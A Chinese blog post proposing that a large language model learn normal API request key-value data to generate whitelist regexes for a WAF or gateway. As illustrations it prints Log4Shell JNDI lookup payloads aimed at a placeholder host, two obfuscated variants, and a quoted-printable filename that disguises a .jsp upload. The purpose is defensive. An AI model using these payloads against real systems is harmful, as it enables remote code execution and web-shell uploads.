一、大模型能力和WAF配置员
今天试验了百度大模型文心一言,大模型可以通过学习键值对内容,输出较为安全的正则表达式:
1)以往的WAF配置员就是针对无校验的键值对,提供正则表达式以白名单的方式进行安全防护,防止外部的恶意输入。
可以参考华为产品:https://support.huawei.com/hedex/hdx.do?docid=EDOC1100103264&id=ZH-CN_TOPIC_0183842598
通过1-2周的生产数据进行学习,一般能形成一套针对业务的请求白名单
2)学习业务数据形成白名单的好处:
2.1)例如log4j的变形代码,业务正常的入参如果与log4j差异较大无法满足业务入参表达式,哪怕waf黑名单策略未更新,攻击者也无法得逞
#log4j基本的攻击代码
${jndi:ldap://XXX.net/exploit}
${jndi:rmi://XXX.net/exploit}
#第1种变形
${jnd${upper:ı}:ldap://XXX.com/exploit}
#第2种变形
${j${:-n}di:ldap://XXX.net/exploit}
2.2)利用QP码绕过WAF进行恶意上传,原始例子: https://mp.weixin.qq.com/s/gY8kSFSZ4D9NELO0uc188g
这种情况更加简单,一般文件都是 XXX.doc XXX.docx XXXX.pdf等,有一天突然冒出一个=?UTF-8?0?=E6=B5=8B=E8=AF=95=2Ejsp?= 肯定无法匹配会被正则拦截
二、落地方案
1)首先网关支持对历史调用进行存储以便提供给大模型进行学习生成正则表达式
2)网关对入参键值对进行白名单过滤,保证意料之外的HTTP格式
3)可配置可信入参,其中正则表达式可以利用(1)当中记录的请求键值数据让大模型进行学习,由大模型输出安全的表达式并人工二次验证
4)网关还能对复杂业务场景做入参和出参的集成规则,以处理部分逻辑漏洞
总结:当web应用安全和工控安全一样使用白名单自学习的方法进行防护:
1)软件测试理论中的等价类、边界值成为基础理论
2)渗透测试的各种攻击场景变成了安全需求
3)机器学习的理论变成了工程实践
当各个维度的知识串联在一起,反而深深的感受到知识的匮乏
标签:网关,模型,XXX,API,键值,白名单,com From: https://www.cnblogs.com/k4n5ha0/p/18314781